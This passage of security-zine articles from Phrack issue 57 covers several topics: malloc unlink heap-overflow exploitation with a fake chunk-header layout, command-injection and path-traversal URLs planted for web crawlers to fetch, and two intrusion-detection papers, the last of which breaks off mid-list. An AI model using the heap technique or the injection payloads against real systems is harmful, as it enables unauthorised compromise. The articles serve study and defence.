p); } else unlink(next, bck, fwd); next = chunk_at_offset(p, sz); } The inuse_bit_at_offset, is defined as macro in the beginning of malloc.c: #define inuse_bit_at_offset(p, s)\ (((mchunkptr)(((char*)(p)) + (s)))->size & PREV_INUSE) Since we control the header of the 'next' chunk we can trigger the whole if block at will. The inner if statement is uninteresting, except our chunk is bordering to the top-most chunk. So if we choose to trigger the outer if statement, we will call unlink, which is defined as macro, too: #define unlink(P, BK, FD) \ { \ BK = P->bk; \ FD = P->fd; \ FD->bk = BK; \ BK->fd = FD; \ } The unlink is called with a pointer to a free chunk and two temporary pointer variables, called bck and fwd. It does this to the 'next' chunk header: *(next->fd + 12) = next->bk *(next->bk + 8) = next->fd They are not swapped, but the 'fd' and 'bk' pointers point to other chunks. This two chunks being pointed to are linked, zapping the current chunk from the table. So to exploit a malloc based buffer overflow, we have to write a bogus header in the following chunk and then wait for our chunk getting free'd. [buffer .... ] | [ prev_size ] [ size ] [ fd ] [ bk ] '|' is the chunk boundary. The values we set for 'prev_size' and 'size' do not matter, but two conditions have to be met, in case it should work: a) the least significant bit of 'size' has to be zero b) both, 'prev_size' and 'size' should be add-safe to a pointer that is read from. So either use very small values up to a few thousand, or - to avoid NUL bytes - use big values such as 0xfffffffc. c) you have to ensure that at (chunk_boundary + size + 4) the lowest bit is zeroed out (0xfffffffc will work just fine) 'fd' and 'bk' can be set this way (as used in Solar Designers Netscape Exploit): fd = retloc - 12 bk = retaddr But beware, that (retaddr + 8) is being written to and the content there will be destroyed. You can circumvent this by a simple '\xeb\x0c' at retaddr, which will jump twelve bytes ahead, over the destroyed content. Well, however, exploitation is pretty straight forward now: <6> <4 bogus> | \xff\xff\xff\xfc \xff\xff\xff\xfc Where '|' is the chunk boundary (from that point we overflow). Now, the next two negative numbers are just to survive a few checks in free() and to avoid NUL bytes. Then we store (retloc - 12) properly encoded and then the return address, which will return to the 'jmp-ahead'. The buffer before the '|' is the same as with any x86 exploit, except for the first 12 bytes, because we have to take care of the extra write operation by the unlink macro. Off-by-one / Off-by-five ------------------------ It is possible to overwrite arbitrary pointers, even in cases where you can overwrite only five bytes, or - in special cases - only one byte. When overwriting five bytes the memory layout has to look like: [chunk a] [chunk b] Where chunk a is under your control and overflowable. Chunk b is already allocated as the overflow happens. By overwriting the first five bytes of chunk b, we trash the 'prev_size' element of the chunks header and the least significant byte of the 'size' element. Now, as chunk b is free()'d, backward consolidation pops in, since 'size' has the PREV_INUSE flag cleared (see below). If we supply a small value for 'prev_size', which is smaller than the size of chunk a, we create a fake chunk structure: [chunk a ... fakechunk ...] [chunk b] | p Where prev_size of chunk b points relativly negative to the fake chunk. The code which is exploitable through this setting was already discussed: if (!(hd & PREV_INUSE)) /* consolidate backward */ { prevsz = p->prev_size; p = chunk_at_offset(p, -(long)prevsz); sz += prevsz; if (p->fd == last_remainder(ar_ptr)) /* keep as last_remainder */ islr = 1; else unlink(p, bck, fwd); } 'hd' is the size element of chunk b. When we overwrite it, we clear out the lower two bits, so PREV_INUSE is cleared and the if condition is matched (NUL will do it in fact). In the next few instructions 'p', which was a pointer to chunk b originally, is relocated to our fakechunk. Then the unlink macro is called and we can overwrite the pointers as usual. We use backward consolidation now, while in the previous description we have used forward consolidation. Is this all confusing? Well, when exploiting malloc overflows, do not worry about the details, they will become clearer as you understand the malloc functions from a broader scope. For a really well done overview and description of the malloc implementation in the GNU C Library, take a look at the GNU C Library reference manual [3]. It makes a good read for non-malloc related things, too. Possible obstacles and how to get over with them ================================================ As with any new exploitation technique people will show up which have the 'perfect' solution to the problem in their head or in form of a patch to the malloc functions. Those people - often ones who have never written an exploit themselves - are misleading into a wrong sense of security and I want to leave a few words about those approaches and why they seldomly work. There are three host based stages where you can stop a buffer overflow resulting in a compromise: 1. The bug/overflow stage This is the place where the real overflow happens, where data is overwritten. If this place is known, the origin of the problem can be fixed (at source level). However, most approaches argue that this place is not known and therefore the problem cannot be fixed yet. 2. The activation stage After the overflow happened parts of the data of the application are corrupted. It does not matter what kind of data, whether it is a stack frame, a malloc management record or static data behind a buffer. The process is still running its own path of code, the overwritten data is still passive. This stage is everything after the overflow itself and before the seize of execution control. This is where the natural, non-artificially introduced hurdles for the attacker lies, code which must be passed in a certain way. 3. The seized stage This is everything after control has been redirected from its original path of execution. This is the stage where nopspace and shellcode is executed, where no real exploitation hurdles are left. Now for the protection systems. Most of the "non-exec stack" and "non-exec heap" patches try to catch the switch from stage two to three, where execution is seized, while some proprietary systems check for the origin of a system call from within kernel space. They do not forbid you to run code this way, they try to limit what code can be run. Those systems which allow you to redirect execution in the first place are fundamentally flawed. They try to limit the exploitation in a black-listing way, by trying to plug the places you may want to go to. But if you can execute legal code within the process space its almost everytime enough to compromise the process as a whole. Now for the more challenging protections, which try to gripe you in stage two. Those include - among others - libsafe, StackGuard, FormatGuard, and any compiler or library based patches. They usually require a recompilation or relinking of your existing code, to insert their security 'measures' into your code. This includes canary values, barriers of check bytes or reordering and extensive checking of sanity before doing things which might be bad. While sanity checking in general is a good policy for security, it cannot fix stuff that was broken before. Every of those protections is assuming a certain situation of a bug which might appear in your program and try to predict the results of an attacker abusing the bug. They setup traps which they assume you will or have to trigger to exploit the bug. This is done before your control is active, so you cannot influence it much except by choosing the input data. Those are, of course much more tight than protection systems which only monitor stage three, but still there are ways around them. A couple of ways have been discussed in the past, so I will not go into depth here. Rather, I will briefly address on a protection which I already see on the horizon under a name like 'MallocGuard'. Such a protection would not change the mechanism of malloc management chunks much, since the current code has proved to be effective. The malloc function plays a key role in overall system performance, so you cannot tweak freely here. Such a protection can only introduce a few extra checks, it cannot verify the entire consistency everytime malloc() is called. And this is where it is flawed: Once you seize control over one malloc chunk information, you can seize control over other chunks too. Because chunks are 'walked' by using either stored pointers (SysV) or stored lengths (GlibC), it is possible to 'create' new chunks. Since a sanity check would have to assume inconsistency of all chunks in the worst case, it would have to check all chunks by walking them. But this would eat up too much performance, so its impossible to check for malloc overflows easily while still keep a good performance. So, there will be no 'MallocGuard', or it will be a useless guard, in the tradition of useless pseudo protections. As a friend puts it - 'for every protection there is an anti-protection'. Thanks ====== I would like to thank all proofreaders and correctors. For some really needed corrections I thank MaXX, who wrote the more detailed article about GNU C Library malloc in this issue of Phrack, kudos to him ! :) References ========== [1] Solar Designer, http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt [2] DD Sleator, RE Tarjan, "Self-Adjusting Binary Trees", 1985, http://www.acm.org/pubs/citations/journals/jacm/1985-32-3/p652-sleator/ http://www.math.tau.ac.il/~haimk/adv-ds-2000/sleator-tarjan-splay.pdf [3] The GNU C Library http://www.gnu.org/manual/glibc-2.2.3/html_node/libc_toc.html [4] Solaris 8 Foundation Source Program http://www.sun.com/software/solaris/source/ |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0a of 0x12 |=-------------=[ Against the System: Rise of the Robots ]=--------------=| |=-----------------------------------------------------------------------=| |=-=[ (C)Copyright 2001 by Michal Zalewski ]=-=| -- [1] Introduction ------------------------------------------------------- "[...] big difference between the web and traditional well controlled collections is that there is virtually no control over what people can put on the web. Couple this flexibility to publish anything with the enormous influence of search engines to route traffic and companies which deliberately manipulating search engines for profit become a serious problem." -- Sergey Brin, Lawrence Page (see references, [A]) Consider a remote exploit that is able to compromise a remote system without sending any attack code to his victim. Consider an exploit which simply creates local file to compromise thousands of computers, and which does not involve any local resources in the attack. Welcome to the world of zero-effort exploit techniques. Welcome to the world of automation, welcome to the world of anonymous, dramatically difficult to stop attacks resulting from increasing Internet complexity. Zero-effort exploits create their 'wishlist', and leave it somewhere in cyberspace - can be even its home host, in the place where others can find it. Others - Internet workers (see references, [D]) - hundreds of never sleeping, endlessly browsing information crawlers, intelligent agents, search engines... They come to pick this information, and - unknowingly - to attack victims. You can stop one of them, but can't stop them all. You can find out what their orders are, but you can't guess what these orders will be tomorrow, hidden somewhere in the abyss of not yet explored cyberspace. Your private army, close at hand, picking orders you left for them on their way. You exploit them without having to compromise them. They do what they are designed for, and they do their best to accomplish it. Welcome to the new reality, where our A.I. machines can rise against us. Consider a worm. Consider a worm which does nothing. It is carried and injected by others - but not by infecting them. This worm creates a wishlist - wishlist of, for example, 10,000 random addresses. And waits. Intelligent agents pick this list, with their united forces they try to attack all of them. Imagine they are not lucky, with 0.1% success ratio. Ten new hosts infected. On every of them, the worm does extactly the same - and agents come back, to infect 100 hosts. The story goes - or crawls, if you prefer. Agents work virtually invisibly, people get used to their presence everywhere. And crawlers just slowly go ahead, in never-ending loop. They work systematically, they do not choke with excessive data - they crawl, there's no "boom" effect. Week after week after week, they try new hosts, carefully, not overloading network uplinks, not generating suspected traffic, recurrent exploration never ends. Can you notice they carry a worm? Possibly... -- [2] An example --------------------------------------------------------- When this idea came to my mind, I tried to use the simpliest test, just to see if I am right. I targeted, if that's the right word, general-purpose web indexing crawlers. I created very short HTML document and put it somewhere. And waited few weeks. And then they come. Altavista, Lycos and dozens of others. They found new links and picked them enthusiastically, then disappeared for days. bigip1-snat.sv.av.com: GET /indexme.html HTTP/1.0 sjc-fe5-1.sjc.lycos.com: GET /indexme.html HTTP/1.0 [...] They came back later, to see what I gave them to parse. http://somehost/cgi-bin/script.pl?p1=../../../../attack http://somehost/cgi-bin/script.pl?p1=;attack http://somehost/cgi-bin/script.pl?p1=|attack http://somehost/cgi-bin/script.pl?p1=`attack` http://somehost/cgi-bin/script.pl?p1=$(attack) http://somehost:54321/attack?`id` http://somehost/AAAAAAAAAAAAAAAAAAAAA... Our bots followed them exploiting hypotetical vulnerabilities, compromising remote servers: sjc-fe6-1.sjc.lycos.com: GET /cgi-bin/script.pl?p1=;attack HTTP/1.0 212.135.14.10: GET /cgi-bin/script.pl?p1=$(attack) HTTP/1.0 bigip1-snat.sv.av.com: GET /cgi-bin/script.pl?p1=../../../../attack HTTP/1.0 [...] (BigIP is one of famous "I observe you" load balancers from F5Labs) Bots happily connected to non-http ports I prepared for them: GET /attack?`id` HTTP/1.0 Host: somehost Pragma: no-cache Accept: text/* User-Agent: Scooter/1.0 From: scooter@pa.dec.com GET /attack?`id` HTTP/1.0 User-agent: Lycos_Spider_(T-Rex) From: spider@lycos.com Accept: */* Connection: close Host: somehost:54321 GET /attack?`id` HTTP/1.0 Host: somehost:54321 From: crawler@fast.no Accept: */* User-Agent: FAST-WebCrawler/2.2.6 (crawler@fast.no; [...]) Connection: close [...] But not only publicly available crawlbot engines can be targeted. Crawlbots from alexa.com, ecn.purdue.edu, visual.com, poly.edu, inria.fr, powerinter.net, xyleme.com, and even more unidentified crawl engines found this page and enjoyed it. Some robots didn't pick all URLs. For example, some crawlers do not index scripts at all, others won't use non-standard ports. But majority of the most powerful bots will do - and even if not, trivial filtering is not the answer. Many IIS vulnerabilities and so on can be triggered without invoking any scripts. What if this server list was randomly generated, 10,000 IPs or 10,000 .com domains? What is script.pl is replaced with invocations of three, four, five or ten most popular IIS vulnerabilities or buggy Unix scripts? What if one out of 2,000 is actually exploited? What if somehost:54321 points to vulnerable service which can be exploited with partially user-dependent contents of HTTP requests (I consider majority of fool-proof services that do not drop connections after first invalid command vulnerable)? What if... There is an army of robots, different species, different functions, different levels of intelligence. And these robots will do whatever you tell them to do. It is scary. -- [3] Social considerations ---------------------------------------------- Who is guilty if webcrawler compromises your system? The most obvious answer is: the author of original webpage crawler visited. But webpage authors are hard to trace, and web crawler indexing cycle takes weeks. It is hard to determine when specific page was put on the net - they can be delivered in so many ways, processed by other robots earlier; there is no tracking mechanism we can find in SMTP protocol and many others. Moreover, many crawlers don't remember where they "learned" new URLs. Additional problems are caused by indexing flags, like "noindex" without "nofollow" option. In many cases, author's identity and attack origin wouldn't be determined, while compromises would take place. And, finally, what if having particular link followed by bots wasn't what the author meant? Consider "educational" papers, etc - bots won't read the disclaimer and big fat warning "DO NOT TRY THESE LINKS"... By analogy to other cases, e.g. Napster forced to filter their contents (or shutdown their services) because of copyrighted information exchanged by their users, causing losses, it is reasonable to expect that intelligent bot developers would be forced to implement specific filters, or to pay enormous compensations to victims suffering because of bot abuse. On the other hand, it seems almost impossible to successfully filter contents to elliminate malicious code, if you consider the number and wide variety of known vulnerabilities. Not to mention targeted attacks (see references, [B], for more information on proprietary solutions and their insecuritities). So the problem persists. Additional issue is that not all crawler bots are under U.S. jurisdiction, which makes whole problem more complicated (in many countries, U.S. approach is found at least controversial). -- [4] Defense ------------------------------------------------------------ As discussed above, webcrawler itself has very limited defense and avoidance possibilities, due to wide variety of web-based vulnerabilities. One of more reasonable defense ideas is to use secure and up-to-date software, but - obviously - this concept is extremely unpopular for some reasons - www.google.com, with unique documents filter enabled, returns 62,100 matches for "cgi vulnerability" query (see also references, [D]). Another line of defense from bots is using /robots.txt standard robot exclusion mechanism (see references, [C], for specifications). The price you have to pay is partial or complete exclusion of your site from search engines, which, in most cases, is undesired. Also, some robots are broken, and do not respect /robots.txt when following a direct link to new website. -- [5] References --------------------------------------------------------- [A] "The Anatomy of a Large-Scale Hypertextual Web Search Engine" Googlebot concept, Sergey Brin, Lawrence Page, Stanford University URL: http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm [B] Proprietary web solutions security, Michal Zalewski URL: http://lcamtuf.coredump.cx/milpap.txt [C] "A Standard for Robot Exclusion", Martijn Koster URL: http://info.webcrawler.com/mak/projects/robots/norobots.html [D] "The Web Robots Database" URL: http://www.robotstxt.org/wc/active.html URL: http://www.robotstxt.org/wc/active/html/type.html [E] "Web Security FAQ", Lincoln D. Stein URL: http://www.w3.org/Security/Faq/www-security-faq.html |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0b of 0x12 |=------------=[ HOLISTIC APPROACHES TO ATTACK DETECTION ]=--------------=| |=-----------------------------------------------------------------------=| |=-----------------------------=[ sasha ]=-------------------------------=| "The art of writing a beautiful fugue lies precisely in [the] ability to manufacture several different lines, each one of which gives the illusion of having been written for its own beauty, and yet which when taken together form a whole which does not seem forced in any way. Now, this dichotomy between hearing a fugue as a whole, and hearing its component voices, is a particular example of a very general dichotomy, which applies to many kinds of structures built up from lower levels. A similar analysis could be made of dozens of Escher pictures, which rely heavily upon the recognition of certain basic forms, which are then put together in nonstandard ways; and by the time the observer sees the paradox on a high level, it is too late - he can't go back and change his mind about how to interpret the lower-level objects." - Douglas R. Hofstadter [Hofstadter, 1979]. "Oddly enough, one of the things that got me started was a joke, the title of a book by Douglas Adams - Dirk Gently's Holistic Detective Agency. And I thought, that's an interesting phrase - what would it mean to solve a crime holistically? It would mean that you'd have to 'solve' not just the crime, but the whole world in which the crime took place." - Alan Moore [Moore, 2000]. ----| 1. Introduction This article concerns various approaches to the problem of detecting attacks. Specifically, we are interested in enterprise environments in which weaknesses in traditional security monitoring methods become apparent. Holistic methods are proposed as a partial solution to some of the shortcomings in traditional reductionist approaches. Existing research literature will be reviewed, an example enterprise security monitoring architecture that employs a holistic approach is described, and some predictions regarding the future of security monitoring are made in the concluding section. ----| 2. Problem Space Modern enterprise networks generate a vast amount of real-time environmental data relating to security status, system status, network status, application status, and so on. Network management technologies and architectures have evolved over time to solve the problems inherent in processing large amounts of event data: event correlation, event reduction, and root-cause analysis are all employed. Security monitoring technologies and architectures however, have not yet matured to the same extent. Most, if not all, security monitoring technologies focus on reporting low-level events (such as observed attacks) in as much detail as possible. That approach is useful in a small environment but fails in an enterprise environment for the following reasons: * The contextual information surrounding the detection of events might not be available due to the rate of change in the network and the possible geographic separation of event generators and management consoles. * The "signal-to-noise" ratio is much higher in an enterprise environment due to the large number of event generators. * The people performing monitoring may not have the privilege or mandate to connect to machines to investigate possible incidents, therefore they must rely purely on the event data available to them. Current security monitoring technologies are difficult to scale for the above reasons and are therefore difficult to deploy and use in an enterprise environment. Traditional approaches to attack detection focus exclusively on analysis based on reductionism. This article advocates a holistic approach that can work in conjunction with traditional reductionist methods and add additional value. These terms are now described below. ----| 3. Reductionism and Holism Traditional security monitoring technologies such as network and host based IDS (Intrusion Detection Systems) and host based integrity checkers, operate on a reductionist basis. The reductionist approach is based on the belief that a whole can be largely understood by examining its constituent parts; i.e. it is possible to infer the existence of an attack if a specific observation can be made. Such tools attempt to detect unauthorized change(s) or to match current activity against known indicators of misuse. Alongside the reductionist approach is the holistic approach. Holism is based on the belief that a whole is greater than the sum of its parts; i.e. it is possible to infer the existence of an attack if a set of observations (that are perhaps superficially unrelated) can be approximately matched to a structure that represents knowledge of the methods that attacks employ at a high(er) level. Another way to describe this distinction is as follows: reductionist methods reason by induction - they reason from particular observations to generate supposed truths. Holistic methods do the reverse - they start with general knowledge and predict a specific set of observations. In reality, the solution of complex problems is best achieved by long strings of mixed inductive and deductive inferences that weave back and forth between observations and internal models. ----| 4. Epiphenomena and the Connection Chain Problem The following quote is from [Hofstadter, 1979] - "I would like to relate a story about a complex system. I was talking one day with two systems programmers for the computer I was using. They mentioned that the operating system seemed to be able to handle up to about thirty-five users with great comfort, but at about thirty five users or so, the response time all of a sudden shot up, getting so slow that you might as well log off and go home and wait until later. Jokingly, I said, "Well, that's simple to fix - just find the place in the operating system where the number '35' is stored, and change it to '60'!". Everyone laughed. The point is, of course, that there is no such place. Where, then, does the critical number - 35 users - come from?. The answer is: it is a visible consequence of the overall system organization - an 'Epiphenomemon'. Similarly, you might ask about a sprinter, "Where is the '9.3' stored, that makes him be able to run 100 yards in 9.3 seconds?". Obviously, it is not stored anywhere. His time is a result of how he is built, what his reaction time is, a million factors all interacting when he runs. The time is quite reproducible, but it is not stored in his body anywhere. It is spread around among all of the cells of his body and only manifests itself in the act of the sprint itself." The two examples above illustrate the sort of thinking that gives rise to holistic solutions. If we concede that an event that occurs in a security monitoring architecture can often only acquire significance when viewed in the context of other activity, then we can theorize that it is possible to detect the presence of an attack by looking for epiphenomenon that occur as the by-product of attacks. This approach has been taken to the connection chain problem. To explain the connection chain problem it is necessary to first introduce some terminology. When an individual (or a program) connects to one computer, and from there connects to another computer, and another, that is referred to as a "connection chain". The ability to detect a connection chain is advantageous - since it is the traditional mechanism used by attackers to attempt to obfuscate their "real" (i.e. initial) location. In [Staniford-Chen, 1995] a system is described that can thumbprint a connection chain by monitoring the content of connections. This is achieved by forming a signature for the data in a network connection. This signature is a small quantity which does not allow complete reconstruction of the data, but does allow comparison with signatures of other connections to determine with reasonable confidence whether the underlying connection is the same or not. The specific technology developed to perform this task is called local thumbprinting. This involves forming linear combinations of the frequencies with which different characters occur in the network data sampled. The optimal linear combinations are chosen using a statistical methodology called principle component analysis which is shown to work successfully when given at least a minute and a half of a reasonably active network connection. Thumbprinting relies on the fact that the content of an extended connection is invariant at all points of the chain (once protocol details are abstracted out). Thus, if the system can compute thumbprints of the content of each connection, these thumbprints can then be compared to establish whether two connections have the same content. A weakness in this method is that disguising the content of the extended connection (such as encrypting it differently on each link of the chain) can circumvent the technology. In [Zhang et al., 2000] the connection chain problem is approached by employing methods that do not rely on packet contents - by leveraging the distinct properties of interactive network traffic (smaller packet sizes and longer idle periods for interactive traffic than for machine generated traffic) to develop an algorithm. These examples shows that it is possible to detect attacks in a way that does not rely on the detection of individual attack techniques. ----| 5. Attack-Strategy Based Intrusion Detection Another advantage to holistic methods that work on a "higher" layer of inference than reductionist methods is in the area of attack strategy analysis. In [Huang et al., 2000], an IDS framework is described that can perform "intention analysis". Intention analysis takes the form of "If A occurs, then B occurs, we can predict that C will occur". The suggested implementation mechanism in the paper is to employ a goal-tree with the root node the ultimate goal of an attack. Lower level nodes represent alternatives or ordered sub-goals in achieving the upper node / goal. Leaves (end nodes) are sub-goals that can be substantiated using events that can be identified in the environment using monitoring. The addition of a temporal aspect to the model enables the model to "predict" likely future steps in an attack as an attacker attempts to climb logically higher in the goal-tree. This example shows the significant extra value that can be provided by "stepping back" and analyzing event data at a higher layer. The reductionist tendency is to step forwards and look into activity in detail; the holistic tendency is to step backwards and look at activity only in the context of other activity. Of course, a holistic model still relys on data gathered from the environment using reductionist techniques, and this is discussed along with other issues in the section below. ----| 6. An Example Model for an Enterprise Security Monitoring System Employing a holistic approach to attack detection is especially useful in enterprise environments. In such environments, the large number of event generators can report such a large amount of data that the task of detecting attacks within that dataset can only realistically be achieved programmatically; that is where holistic methods can add value. The "event generators" mentioned above can be any component within the IT infrastructure that generates information regarding the status of some aspect of the infrastructure. The form and function of event generators is irrelevant to this discussion, although they would likely include host and network based IDS, RMON probes, firewalls, routers, hosts, and so on. Each event generator will employ an event delivery mechanism such as SNMP, syslog, ASCII log file, etc. In this article we will abstract out the delivery mechanism used to transport events prior to processing. I propose the following model. The data from event generators can be used to populate a knowledge structure that isomorphically describes a number of common attack methodologies. Think about the ordered set of steps that are carried out when attacking a system; this is a methodology. There are a large number of ways in which each step in an attack can be carried out, but the relationship between the steps usually remains static in terms of the underlying methodology. An isomorphism is an information preserving transformation. It applies when two structures can be mapped onto each other in such a way that for each part of one structure there is a corresponding part in the other structure, where "corresponding" means that the two parts play similar roles in their respective structures. A set of structures that map isomorphically to common attack methodologies can therefore be constantly compared to a structure that is being constantly populated by event data from the monitored environment. The process used to determine when an attack is detected would use a "soft-decision" approach. A soft-decision process can report partial evidence when a predetermined amount of a knowledge structure is populated. A soft-decision process can also output a level of confidence in the result at any given time, i.e. it accumulates and integrates data (events) and reports partial conclusions and the associated level of (un)certainty as new data arrives. The advantage in this approach is that an attacker can often hide or obfuscate components of their attack by exploiting weaknesses in specific attack detection technologies or by simply being stealthy (remember - we still rely on reductionist event gathering technologies "underneath"). However, the weight of data collected within the environment can be used to indicate the presence of an attack on a higher, more abstract layer, in which seemingly unrelated changes or events that occur within the environment can be shown to be related by using codified knowledge of the sequence of events that comprise different types of attacks (methodologies). In addition, weaknesses in the ability of individual event detectors to make an accurate decision about activity (see [Ptacek, 2000]) become less damaging. Instead of relying on the absolute determination of the existence of an attack, an event detector can contribute information about what it thinks it _might_ have seen, and leave attack determination to a higher layer. The attack structure of attacks that employ automated agents as in [Jitsu et al., 2000], or distributed agents as in [Stewart, 2000], will likely be the most simplistic to codify as they employ techniques based on programmed internal rules. ----| 7. Concluding Remarks The difficulties involved in performing security monitoring of enterprise environments has driven the recent demand for outsourced managed security monitoring services. Companies such as Guardent (www.guardent.com), Counterpane (www.counterpane), and Internet Security Systems (www.issx.com) all offer managed security services. These companies are employing technologies which are based in part on a holistic approach, for example - those described in [Counterpane, 2001]. The individual components of an attack, such that an individual event generator might detect, are not "context free". The reductionist idea that each component within an attack contributes to the entirety of the attack in a manner that is independent of the other components, must be rejected. The holistic concept is that an attack cannot be considered to be built up from the context free functions of its components (a declarative approach); rather, it is considered how the components interact (a procedural approach). From an attackers perspective, it will soon not be enough to obfuscate against detection by specific technologies. Attacks that attempt to shield themselves against detection by specific approaches to intrusion detection (for example - by modulating shellcode to escape detection by specific signatures), and/or against detection by specific products, will become less effective. The next generation of security monitoring and intrusion detection technologies will employ a strategy based on holistic methods in which the underlying form and structure of attacks is codified and can subsequently be recognized. ----| 8. References [Counterpane, 2000] Counterpane Internet Security, Socrates and Sentry. http://www.counterpane.com/integrated.html [Hofstadter, 1979] Douglas R. Hofstadter, "Godel, Escher, Bach: an Eternal Golden Braid", 20th-Anniversary Edition, Penguin Books, 2000. [Huang et al., 1998] Ming-Yuh Huang and Thomas M. Wicks, "A Large-scale Distributed Intrusion Detection Framework Based on Attack Strategy Analysis", Proc. 1st International Workshop on the Recent Advances in Intrusion Detection, Louvain-la-Neuve, Belgium, September 14-16, 1998. [Jitsu et al., 2000] Jitsu-Disk, Simple Nomad, Irib, "Project Area52", Phrack Magazine, Volume 10, Issue 56, File 6 of 16, May 2000. [Moore, 2000] http://independent-sun-01.whoc.theplanet.co.uk/enjoymen t/Books/Interviews/2000-07/alanmoore210700.shtml [Ptacek et al., 2000] Thomas H. Ptacek and Timothy N. Newsham, "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion", January 1998. http://www.securityfocus.com/data/library/ids.ps [Staniford-Chen, 1995] Stuart Staniford-Chen, "Distributed Tracing of Intruders", Masters Thesis, University of California, Davis, 1995. [Stewart, 2000] Andrew J. Stewart, "Distributed Metastasis: A Computer Network Penetration Methodology", September, 1999. http://www.securityfocus.com/data/library/distri buted_metastasis.pdf [Zhang et al., 2000] Yin Zhang and Vern Paxson, "Detecting Stepping Stones", Proc. 9th USENIX Security Symposium, Denver, Colorado, August 2000. |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0c of 0x12 |=-----------------=[ Network Intrusion Detection System ]=--------------=| |=--------------=[ On Mass Parallel Processing Architecture ]=-----------=| |=------------=[ Wanderley J. Abreu Jr. ]=---------=| "Nam et Ipsa Scientia Potestas Est" - Francis Bacon 1 ----|Introduction: One of the hardest challenges of the security field is to detect with a 100% certainty malicious attacks while they are occuring, and taking the most effective method to log, block and prevent it from happening again. The problem was solved, partially. About 19 years ago, Intrusion Detection System concept came to fit the market wishes to handle security problems concerning Internal/External attacks, with a low or medium cost, without major needs for trained security personnel, since any network administrator "seems" to manage them well. But then we came across some difficulties with three demands of anomaly and policy based IDS which are: effectiveness, efficiency and ease of use. This paper focuses on enhancing the bayesian detection rate by constructing a Depth-Search algorithm based IDS on a mass parallel processing (MPP) environment and give a mathematical aproach to effectiveness of this model in comparision with other NIDS. One Problem with building any software on such an expensive environment,like most MPPs, is that it is limited to a very small portion of computer community, thus we'll focus on High Performance Computer Cluster called "Class II - Beowulf Class Cluster" which is a set of tools developed by NASA. These tools are used to emulate MPP environment built of x86 computers running under Linux Based Operating Systems. The paper does not intend to offer the absolute solution for false positives and false negatives generated by Network-Based IDS, but it gives one more step towards the utopia. 2 -----|Bayesian Detection Rate (BDR): In 1761, Reverend Thomas Bayes brought us a concept for govern the logical inference, determining the degree of confidence we may have, in various possible conclusions, based on the body of evidence available. Therefore, to arrive at a logically defensible prediction one must use Bayes’ theorem. The Bayesian Detection Rate was first used to measure IDS effectiveness in Mr. Stefan Axelson paper "The Base-Rate Fallacy and its Implications for the Difficulty of Intrusion Detection" presented on RAID 99 which gives a realistic perspective on how "False Alarm" rate can limit the performance of an IDS. As said, the paper aims to increase the detection rate reducing false alarms on the IDS model, therefore we must know the principles of Bayesian Detection Rate (BDR): P(D|H)P(H) P(H|D) = ------------------------- P(D|H)P(H) + P(D|H')P(H') Let's use a simple example to ilustrate how Bayes Theorem Works: Suppose that 2% of people your age and heredity have cancer. Suppose that a blood test has been developed that correctly gives a positive test result in 90% of people with cancer, and gives a false positive in 10% of the cases of people without cancer. Suppose you take the test, and it is positive. What is the probability that you actually have cancer, given the positive test result? First, you must identify the Hypothesis, H, the Datum, D, and the probabilities of the Hypothesis prior to the test, and the hit rate and false alarm rates of the test. H = the hypothesis; in this case H is the hypothesis that you have cancer, and H' is the hypothesis that you do not. D = the datum; in this case D is the positive test result. P(H) is the prior probability that you have cancer, which was given in the problem as 0.02. P(D|H) is the probability of a positive test result GIVEN that you have cancer. This is also called the HIT RATE, and was given in the problem as 0.90. P(D|H') is the probability of a positive test result GIVEN that you do not have cancer. This is also called the FALSE ALARM rate, and was given as 0.10. P(H|D) is the probability that you have cancer, given that the test was positive. This is also called the posterior probability or Bayesian Detection Rate. In this case it was 0.155(16% aprox., i'd not bet the rest of my days on this test). Applying it to Intrusion Detection Let's say that: Ii -> Intrusion behaviour Ij -> Normal behaviour Ai -> Intrusion Alarm Aj -> No Alarm Now, what a IDS is meant to do is alarm us when log pattern really indicates an intrusion, so what we want is P(Ii|Ai), or the Bayesian Detection Rate. P(Ii) P(Ai|Ii) P(Ii|Ai) = ---------------------------------- P(Ii) P(Ai|Ii) + P (Ij) P(Ai|Ij) Where: True Positive Rate P(Ai|Ii): Real Attack-Packets Detected P(Ai|Ii) = ---------------------------------- Total Of Real Attack-Packets False Positive Rate P(Ai|Ij): False Attack-Packets Detected P(Ai|Ij) = ------------------------------------------------------- (Total Of Packets) - (Total Of Real Attack-Packets) Intrusive Behaviour P(Ii): 1 P(Ii) = ------------------------------------------------------------- Total of Packets ----------------------------------------------------- (Number of Packets Per Attack) * (Number of Attacks) Non-Intrusive Behaviour P(Ij): P(Ij) = 1 - P(Ii) By now you should realize that the Bayesian Detection Rate increases if the False Positive Rate decreases. 3 -----|Normal Distribution: To detect a raise on BDR we must know what is the standard BDR for actual Intrusion Detection Systems so we'll use a method called Normal Distribution. Normal distributions are a family of distributions that have the same general shape. They are symmetric with scores more concentrated in the middle than in the tails. Normal distributions are sometimes described as bell shaped. The area under each curve is the same. The height of a normal distribution can be specified mathematically in terms of two parameters: +the mean (m) and the standard deviation (s). +The height (ordinate) of a normal curve is defined as: 1 f(x)= ------------------ * e ^(-(x-m)^2)/2s^2 /-------------| \/ 2*p*s^2 Where m is the mean and s is the standard deviation, p is the constant 3.14159, and e is the base of natural logarithms and is equal to 2.718282. x can take on any value from -infinity to +infinity. 3.1 ---------| The Mean: The arithmetic mean is what is commonly called the average and it can be defined as: x1 + x2 + x3 + ... + xn m = ----------------------- n Where n is the number of scores entered. 3.2 ---------| The Standard Deviation: The Standard Deviation is a measure of how spread out a distribution is. It is computed as the average squared deviation of each number from its mean: (x1 - m) ^2 + (x2 - m) ^2 + (x3 - m) ^2 + ... + (xn - m) ^2 s^2 = ------------------------------------------------------------- n Where n is the number of scores entered. We'll define a experimental method in which X will be the BDR for the most known IDS from market and we'll see how much our protype based on MPP plataform will differ from their results with the Normal Distribution Method and with the Standard Deviation. 4 ------|Experimental Environment: Now we should gather experimental information to trace some standard to IDS BDR: Let's take the default installation of 10 IDS plus our prototype, 11 in total running at this configuration: *Pentium 866 MHZ *128 MBytes RAM *100 Mb/s fast Ethernet Adapter(Intel tulip based(2114X) ) *1Megabyte of synchronous cache *Motherboard 